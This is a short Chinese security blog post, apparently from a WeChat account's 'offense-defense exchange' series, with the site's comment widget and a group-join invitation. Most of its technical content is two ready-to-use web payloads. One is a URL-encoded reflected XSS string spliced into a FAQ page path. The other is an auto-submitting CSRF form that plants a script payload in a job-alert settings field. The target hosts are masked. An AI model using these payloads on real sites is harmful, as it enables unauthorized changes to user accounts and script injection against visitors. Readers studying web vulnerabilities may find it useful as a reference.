安全娱乐圈之攻防技术交流系列文章 第5弹

  • A+
所属分类:安全文章


安全娱乐圈之攻防技术交流系列文章 第5弹


1


假设有如下网址:


https://xxx.xxx.xxx/FAQ/Aaabbbbbb-Question-FAQ200086-E1651.htm?countryRedirect=true


将如下payload插入到Aaabbbbbb之间


%22%3e%3cimg%20onerro%3d%3e%3cimg%20src%3dx%20onerror%3dalert%601%60%3e


安全娱乐圈之攻防技术交流系列文章 第5弹


最终访问


https://xxx.xxx.xxx/FAQ/Aaa%22%3e%3cimg%20onerro%3d%3e%3cimg%20src%3dx%20onerror%3dalert%601%60%3ebbbbbb-Question-FAQ200086-E1651.htm?countryRedirect=true


将有可能造成反射型XSS


2


上传一个视频秀,在payload处添加有效载荷,当用户打开恶意页面加载有效载荷时,触发弹窗。


<body>  <form id="xss" action="https://xxx.xxx.xxx/profile/editJobAlert.htm" method="post">      <input type="hidden" name="setupJobAlertEmail" value="false"><br>      <input type="hidden" name="userValidationKey" value=""><br>      <input type="hidden" name="key" value=""><br>      <input type="hidden" name="jobAlertId" value="[the id of the jobalert]"><br>      <input type="hidden" name="JAK" value=""><br>      <input type="hidden" name="reactivation" value="false"><br>      <input type="hidden" name="linkOrigin" value=""><br>      <input type="hidden" name="keywords" value="[the name]"><br>      <input type="hidden" name="rawLocationName" value="Cairo"><br>      <input type="hidden" name="locationType" value="C"><br>      <input type="hidden" id="payload" name="locationId" value=""><br>      <input type="hidden" name="emailFrequency" value="WEEKLY"><br>      <input type="hidden" value="send">  </form></body>
<script type="text/javascript"> var x = "1234567'><marquee onstart="[domain].find(confirm)">"; document.getElementById("payload").value = x; document.getElementById("xss").submit();</script>


星光不问赶路人,岁月不负有心人!

安全娱乐圈之攻防技术交流系列文章 第5弹

    加油,网安人!


“攻防技术交流”这一个系列的文章

主要记录日常实战与学习交流的

攻防思路与心得体会

如果你有新奇的攻防idea

非常欢迎与小伙伴们一起分享交流

VX群暗号

后台回复“ 技术交流 ”获取

入群须知:

纯技术交流群禁止灌水

长期潜水不分享交流的会进行清理

希望大家予以理解


安全娱乐圈之攻防技术交流系列文章 第5弹

● 安全娱乐圈之攻防技术交流系列文章 第1弹

● 安全娱乐圈之攻防技术交流系列文章 第2弹

● 安全娱乐圈之攻防技术交流系列文章 第3弹

● 安全娱乐圈之攻防技术交流系列文章 第4弹

本文始发于微信公众号(西子实验室):安全娱乐圈之攻防技术交流系列文章 第5弹

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: